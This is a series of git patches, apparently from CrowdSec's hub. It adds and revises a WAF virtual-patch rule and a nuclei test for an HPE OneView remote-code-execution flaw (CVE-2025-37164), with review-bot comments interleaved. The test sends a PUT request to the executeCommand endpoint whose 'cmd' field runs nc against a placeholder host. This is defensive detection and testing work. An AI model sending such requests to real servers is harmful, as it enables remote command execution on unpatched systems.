From 668036f1c8c76bf3b163193784701ea606e240fe Mon Sep 17 00:00:00 2001
From: crowdsec-automation <63358111+crowdsec-automation@users.noreply.github.com>
Date: Mon, 29 Dec 2025 16:17:11 +0100
Subject: [PATCH 01/12] Add vpatch-CVE-2025-37164 rule
---
 .../crowdsecurity/vpatch-CVE-2025-37164.yaml | 31 +++++++++++++++++++
 1 file changed, 31 insertions(+)
 create mode 100644 appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml
new file mode 100644
index 00000000000..c16fecec96d
--- /dev/null
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml
@@ -0,0 +1,31 @@
+## autogenerated on 2025-12-29 15:17:08
+name: crowdsecurity/vpatch-CVE-2025-37164
+description: 'Detects remote code execution attempts in HPE OneView via executeCommand endpoint.'
+rules:
+ - and:
+ - zones:
+ - URI
+ transform:
+ - lowercase
+ match:
+ type: contains
+ value: /rest/id-pools/executecommand
+ - zones:
+ - RAW_BODY
+ transform:
+ - lowercase
+ match:
+ type: contains
+ value: '"cmd":'
+
+labels:
+ type: exploit
+ service: http
+ confidence: 3
+ spoofable: 0
+ behavior: 'http:exploit'
+ label: 'HPE OneView - RCE'
+ classification:
+ - cve.CVE-2025-37164
+ - attack.T1190
+ - cwe.CWE-94
From 46331897c074762e97f7b6b71d97561a52a2241c Mon Sep 17 00:00:00 2001
From: crowdsec-automation <63358111+crowdsec-automation@users.noreply.github.com>
Date: Mon, 29 Dec 2025 16:17:12 +0100
Subject: [PATCH 02/12] Add vpatch-CVE-2025-37164 test config
---
 .appsec-tests/vpatch-CVE-2025-37164/config.yaml | 5 +++++
 1 file changed, 5 insertions(+)
 create mode 100644 .appsec-tests/vpatch-CVE-2025-37164/config.yaml
diff --git a/.appsec-tests/vpatch-CVE-2025-37164/config.yaml b/.appsec-tests/vpatch-CVE-2025-37164/config.yaml
new file mode 100644
index 00000000000..6aa2a6a1731
--- /dev/null
+++ b/.appsec-tests/vpatch-CVE-2025-37164/config.yaml
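Review bot: The second condition keys on the mere presence of a `cmd` key in the body (`value: '"cmd":'` here; `variables: - json.cmd` with regex `.+` once patch 12 lands), not on any exploit-specific content, so every request to the executeCommand endpoint carrying a non-empty `cmd` is reported as an exploit (the accompanying test expects a 403). If legitimate API clients use this endpoint with a `cmd` parameter — the page does not show the API's contract — they are denied as well, a deliberate virtual-patch trade-off that `description` does not state. Suggest `description: 'Blocks requests to the HPE OneView /rest/id-pools/executeCommand endpoint carrying a cmd parameter (CVE-2025-37164 RCE); legitimate use of this endpoint is also denied while the product is unpatched.'` so operators reading the alert know the rule is presence-based rather than payload-based.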
@@ -0,0 +1,5 @@
+## autogenerated on 2025-12-29 15:17:08
+appsec-rules:
+ - ./appsec-rules/crowdsecurity/base-config.yaml
+ - ./appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml
+nuclei_template: CVE-2025-37164.yaml
From bfdf4230b73a0800246fb17eac3a4bae3821cb34 Mon Sep 17 00:00:00 2001
From: crowdsec-automation <63358111+crowdsec-automation@users.noreply.github.com>
Date: Mon, 29 Dec 2025 16:17:14 +0100
Subject: [PATCH 03/12] Add CVE-2025-37164.yaml test
---
 .../vpatch-CVE-2025-37164/CVE-2025-37164.yaml | 26 +++++++++++++++++++
 1 file changed, 26 insertions(+)
 create mode 100644 .appsec-tests/vpatch-CVE-2025-37164/CVE-2025-37164.yaml
diff --git a/.appsec-tests/vpatch-CVE-2025-37164/CVE-2025-37164.yaml b/.appsec-tests/vpatch-CVE-2025-37164/CVE-2025-37164.yaml
new file mode 100644
index 00000000000..e7ebb98bc6b
--- /dev/null
+++ b/.appsec-tests/vpatch-CVE-2025-37164/CVE-2025-37164.yaml
@@ -0,0 +1,26 @@
+## autogenerated on 2025-12-29 15:17:08
+id: CVE-2025-37164
+info:
+ name: CVE-2025-37164
+ author: crowdsec
+ severity: info
+ description: CVE-2025-37164 testing
+ tags: appsec-testing
+http:
+ - raw:
+ - |
+ PUT /rest/id-pools/executeCommand HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/json
+ X-API-Version: 3800
+ Accept-Encoding: gzip
+
+ {
+ "cmd":"nc {{interactsh-url}}",
+ "result":0
+ }
+ cookie-reuse: true
+ matchers:
+ - type: status
+ status:
+ - 403
From c7a98805c547608acfdd1f9499dab1515c81f35d Mon Sep 17 00:00:00 2001
From: crowdsec-automation <63358111+crowdsec-automation@users.noreply.github.com>
Date: Mon, 29 Dec 2025 16:17:16 +0100
Subject: [PATCH 04/12] Add vpatch-CVE-2025-37164 rule to vpatch collection
---
 collections/crowdsecurity/appsec-virtual-patching.yaml | 1 +
 1 file changed, 1 insertion(+)
diff --git a/collections/crowdsecurity/appsec-virtual-patching.yaml b/collections/crowdsecurity/appsec-virtual-patching.yaml
index 40e67fb33ef..47de455879a 100644
--- a/collections/crowdsecurity/appsec-virtual-patching.yaml
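Review bot: The template does not record what it pins: the mixed-case `executeCommand` path is what exercises the `lowercase` transform on the URI zone, the `"cmd"` key exercises the body condition, and the expected `403` is presumably the appsec engine's verdict rather than the application's own answer, since config.yaml routes the request through base-config.yaml. A one-line comment above the `raw` entry, e.g. `# mixed-case path + JSON cmd key: both AND conditions of the rule must match to get the 403`, would keep the test meaningful when the rule is edited. `description: CVE-2025-37164 testing` could carry the same sentence instead of restating the id.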
+++ b/collections/crowdsecurity/appsec-virtual-patching.yaml
@@ -146,6 +146,7 @@ appsec-rules:
 - crowdsecurity/vpatch-CVE-2025-9316
 - crowdsecurity/vpatch-CVE-2025-11700
 - crowdsecurity/vpatch-CVE-2025-13315
+- crowdsecurity/vpatch-CVE-2025-37164
 author: crowdsecurity
 contexts:
 - crowdsecurity/appsec_base
From 6e80e3df392d524ca4250fc3b499adeb37e33ada Mon Sep 17 00:00:00 2001
From: Thibault Koechlin
Date: Wed, 14 Jan 2026 16:19:50 +0100
Subject: [PATCH 05/12] ci
From 4bc67451a39fc482c377d02eec5bc9f01667474d Mon Sep 17 00:00:00 2001
From: "Thibault \"bui\" Koechlin"
Date: Wed, 21 Jan 2026 15:34:24 +0100
Subject: [PATCH 06/12] Update vpatch-CVE-2025-37164.yaml
---
 appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml
index c16fecec96d..072005a9380 100644
--- a/appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml
@@ -11,7 +11,7 @@ rules:
 type: contains
 value: /rest/id-pools/executecommand
 - zones:
- - RAW_BODY
+ - RAW_REQUEST_BODY
 transform:
 - lowercase
 match:
From 5c9cb2ec41d5d7825982f1fa7a9bb2313c5df2e2 Mon Sep 17 00:00:00 2001
From: "Thibault \"bui\" Koechlin"
Date: Wed, 21 Jan 2026 15:35:45 +0100
Subject: [PATCH 07/12] Update zone from RAW_REQUEST_BODY to RAW_BODY
---
 appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml
index 072005a9380..c16fecec96d 100644
--- a/appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml
@@ -11,7 +11,7 @@ rules:
 type: contains
 value: /rest/id-pools/executecommand
 - zones:
- - RAW_REQUEST_BODY
+ - RAW_BODY
 transform:
 - lowercase
 match:
From 70e824c86c022cad75d7a9cab7afc0e69b1e9b99 Mon Sep 17 00:00:00 2001
From: Sebastien Blot
Date: Wed, 21 Jan 2026 15:48:25 +0100
Subject: [PATCH 08/12] fix escaping
---
 appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml
index c16fecec96d..9ed4bcdbe29 100644
--- a/appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml
@@ -16,7 +16,7 @@ rules:
 - lowercase
 match:
 type: contains
- value: '"cmd":'
+ value: '\"cmd\":'
 
 labels:
 type: exploit
From b9104644261501bb93eeac4150aba68f01a8e866 Mon Sep 17 00:00:00 2001
From: AlteredCoder <64792091+AlteredCoder@users.noreply.github.com>
Date: Wed, 18 Feb 2026 15:51:39 +0100
Subject: [PATCH 09/12] Update CVE-2025-37164.yaml
---
 .appsec-tests/vpatch-CVE-2025-37164/CVE-2025-37164.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/.appsec-tests/vpatch-CVE-2025-37164/CVE-2025-37164.yaml b/.appsec-tests/vpatch-CVE-2025-37164/CVE-2025-37164.yaml
index e7ebb98bc6b..a89f6cd8312 100644
--- a/.appsec-tests/vpatch-CVE-2025-37164/CVE-2025-37164.yaml
+++ b/.appsec-tests/vpatch-CVE-2025-37164/CVE-2025-37164.yaml
@@ -16,7 +16,7 @@ http:
 Accept-Encoding: gzip
 
 {
- "cmd":"nc {{interactsh-url}}",
+ "cmd":"nc foobar.com",
 "result":0
 }
 cookie-reuse: true
From 3c13ceb1c68ba396ba5d92f740e74dde9cb72dfe Mon Sep 17 00:00:00 2001
From: AlteredCoder <64792091+AlteredCoder@users.noreply.github.com>
Date: Wed, 18 Feb 2026 15:54:04 +0100
Subject: [PATCH 10/12] Update vpatch-CVE-2025-37164.yaml
---
 appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml | 8 +++++---
 1 file changed, 5 insertions(+), 3 deletions(-)
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml
index 9ed4bcdbe29..5857f2e9ce3 100644
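Review bot: `value: '\"cmd\":'` is a single-quoted YAML scalar, where a backslash is literal, so the matcher now searches the body for the eight-character string `\"cmd\":` and a plain JSON body `{"cmd": ...}` no longer matches — unless the engine unescapes match values itself, which nothing on the page shows. The previous `'"cmd":'` was already correct, because a double quote needs no escape inside single quotes; the only escape there is `''`. Patch 10 in this series replaces this match altogether, so the final rule is unaffected, but the same edit in another rule would silently disable it, and the test at .appsec-tests/vpatch-CVE-2025-37164/CVE-2025-37164.yaml is the place that should have caught it.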
--- a/appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml
@@ -11,12 +11,14 @@ rules:
 type: contains
 value: /rest/id-pools/executecommand
 - zones:
- - RAW_BODY
+ - BODY_ARGS
 transform:
 - lowercase
+ variable:
+ - json.cmd
 match:
- type: contains
- value: '\"cmd\":'
+ type: regex
+ value: ".*"
 
 labels:
 type: exploit
From 668b9437e9831efbff4721a17defa64df6df9bb3 Mon Sep 17 00:00:00 2001
From: AlteredCoder <64792091+AlteredCoder@users.noreply.github.com>
Date: Wed, 18 Feb 2026 15:58:31 +0100
Subject: [PATCH 11/12] Update vpatch-CVE-2025-37164.yaml
---
 appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml
index 5857f2e9ce3..bc28a555b5a 100644
--- a/appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml
@@ -14,7 +14,7 @@ rules:
 - BODY_ARGS
 transform:
 - lowercase
- variable:
+ variables:
 - json.cmd
 match:
 type: regex
From c14caecc432a2a9348685f6c980cb5b4a2393203 Mon Sep 17 00:00:00 2001
From: AlteredCoder <64792091+AlteredCoder@users.noreply.github.com>
Date: Wed, 18 Feb 2026 16:02:39 +0100
Subject: [PATCH 12/12] Update vpatch-CVE-2025-37164.yaml
---
 appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml b/appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml
index bc28a555b5a..cc691894037 100644
--- a/appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml
+++ b/appsec-rules/crowdsecurity/vpatch-CVE-2025-37164.yaml
@@ -18,7 +18,7 @@ rules:
 - json.cmd
 match:
 type: regex
- value: ".*"
+ value: ".+"
 
 labels:
 type: exploit
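Review bot: `transform: - lowercase` is kept above the new `variable:` block although the match is now a regex on the parsed `json.cmd` value (`.*` here, `.+` after patch 12), which lower-casing cannot influence; drop it, or state in a comment why it stays. The new condition also applies only when the engine has actually parsed the body into `BODY_ARGS` — presumably JSON here, as the test sends `Content-Type: application/json` — and the rule file does not document that precondition; a line such as `# matches on presence of a non-empty cmd in the parsed body; relies on BODY_ARGS having been populated from JSON` next to `- zones:` would record it. The `variable:` key and the `.*` regex are corrected later in the series.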
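Review bot: Changing `.*` to `.+` means an empty `cmd` value now passes, but nothing pins that boundary: the test in .appsec-tests/vpatch-CVE-2025-37164/CVE-2025-37164.yaml sends only a non-empty `cmd` and expects 403. If the harness supports a negative expectation, a second request with `"cmd":""` expecting no block would document why `.+` was chosen over `.*`. The `variable:` key from patch 10 also went unnoticed until patch 11, which suggests the harness does not reject unknown rule keys; a schema lint over appsec-rules would catch that class of silently degraded detection.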